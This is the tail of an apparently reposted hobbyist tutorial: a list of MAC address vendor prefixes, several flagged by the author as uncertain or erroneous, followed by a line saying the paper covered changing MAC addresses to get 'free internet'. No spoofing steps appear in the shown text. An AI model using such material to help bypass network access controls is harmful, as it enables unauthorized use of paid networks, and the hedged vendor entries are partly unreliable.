08006A ATTst (?)
08006E Excelan
080070 Mitsubishi
080074 Casio
080075 DDE (Danish Data Elektronik A/S)
080077 TSL (now Retix)
080079 Silicon Graphics
08007C Vitalink TransLAN III
080080 XIOS
080081 Crosfield Electronics
080083 Seiko Denshi
080086 Imagen/QMS
080087 Xyplex terminal servers
080088 McDATA Corporation
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
08008E Tandem / Solbourne Computer ?
08008F Chipcom Corp.
080090 Retix, Inc. Bridges
09006A AT&T
10005A IBM
100090 Hewlett-Packard Advisor products
1000D4 DEC
1000E0 Apple A/UX (modified addresses for licensing)
2E2E2E LAA (Locally Administered Address) for Meditech Systems
3C0000 3Com dual function (V.34 modem + Ethernet) card
400003 Net Ware (?)
444553 Microsoft (Windows95 internal "adapters")
444649 DFI (Diamond Flower Industries)
475443 GTC (Not registered!) (This number is a multicast!)
484453 HDS ???
484C00 Network Solutions
4854E8 winbond?
4C424C Information Modes software modified addresses (not registered?)
525400 Realtek (UpTech? also reported)
52544C Novell 2000
5254AB REALTEK (a Realtek 8029 based PCI Card)
565857 Aculab plc audio bridges
800010 AT&T [misrepresented as 080010? One source claims this is correct]
80AD00 CNET Technology Inc. (Probably an error, see instead 0080AD)
AA0000 DEC obsolete
AA0001 DEC obsolete
AA0002 DEC obsolete
AA0003 DEC Global physical address for some DEC machines
AA0004 DEC Local logical address for DECNET systems
C00000 Western Digital (may be reversed 00 00 C0?)
EC1000 Enance Source Co., Ltd. PC clones(?)
E20C0F Kingston Technologies


Well, now this paper is becoming bigger and bigger, and I think this should be enough about MAC addresses, changing them and also getting free internet, right?



This article has been taken from: http://www.arson-network.com/index.php?class=tutorial&subargs=686
